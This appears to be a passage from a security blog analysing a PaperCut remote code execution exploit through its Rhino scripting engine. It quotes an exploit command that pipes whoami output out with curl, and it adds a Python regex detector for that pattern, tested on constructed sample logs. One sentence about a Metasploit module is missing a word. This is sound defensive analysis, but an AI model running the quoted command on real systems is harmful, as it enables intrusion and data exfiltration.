In both cases, the attacker abuses the system's built-in JavaScript interface. The JavaScript engine is Rhino, which also allows that user to execute arbitrary Java. PaperCut Software implemented configuration options to lessen the risk of this arbitrary code execution vector, but since the attacker has full administrative access, those protections are easily disabled.

Horizon3.ai's exploit uses the scripting interface to execute a single Windows command (whoami) and sends the response back to the attacker via curl:

exec('cmd.exe /C " for /F " usebackq delims= " %A in (`whoami`) do curl " ')

Perhaps the main reason they didn't establish a reverse shell is because the scripting engine has a five second timeout (see decompiled code below). The attacker cannot maintain execution in the engine itself; they have to migrate to another process. The previously mentioned Metasploit module is interesting. Instead, it uses to load a remote Java class.
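The one-shot command above leaves a recognisable trace in process-creation telemetry: cmd.exe running a for /F usebackq loop whose body hands the captured output to curl. The following is an added detection example, not code from the post or from PaperCut; the event format, the parent process name and all sample events are constructed for illustration.

```python
import json
import re

# Pattern derived from the quoted exploit command: cmd.exe /C running a
# "for /F ... usebackq" loop that passes the captured output to curl.
# The loop variable and the curl target are left open on purpose, since
# an attacker controls both.
CMD_FOR_CURL = re.compile(
    r"cmd\.exe\s+/C\b.*\bfor\s+/F\b.*\busebackq\b.*\bdo\s+curl\b",
    re.IGNORECASE,
)

# Constructed sample process-creation events in JSON-lines form (not real
# telemetry; the parent process name is a placeholder, not PaperCut's).
SAMPLE_LOG = "\n".join([
    json.dumps({"pid": 4101, "parent": "print-server-placeholder.exe",
                "cmdline": 'cmd.exe /C " for /F " usebackq delims= " %A in (`whoami`) do curl " '}),
    json.dumps({"pid": 4102, "parent": "explorer.exe",
                "cmdline": "curl https://example.invalid/updates.json"}),
    json.dumps({"pid": 4103, "parent": "cmd.exe",
                "cmdline": "whoami /all"}),
])


def load_events(text: str) -> list[dict]:
    """Parse JSON-lines process-creation events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_suspicious(cmdline: str) -> bool:
    """True when the command line matches the for /F -> curl exfiltration shape."""
    return bool(CMD_FOR_CURL.search(cmdline))


def find_hits(events: list[dict]) -> list[int]:
    """Return the pids of events whose command line matches the pattern."""
    return [e["pid"] for e in events if is_suspicious(e.get("cmdline", ""))]


def main() -> None:
    for pid in find_hits(load_events(SAMPLE_LOG)):
        print(f"pid {pid}: command output piped to curl from cmd.exe /C")


if __name__ == "__main__":
    main()
```

The regex keys on the loop structure rather than on whoami, so it also catches the same shape wrapping a different command; pairing it with the parent process of your scripting host narrows it further.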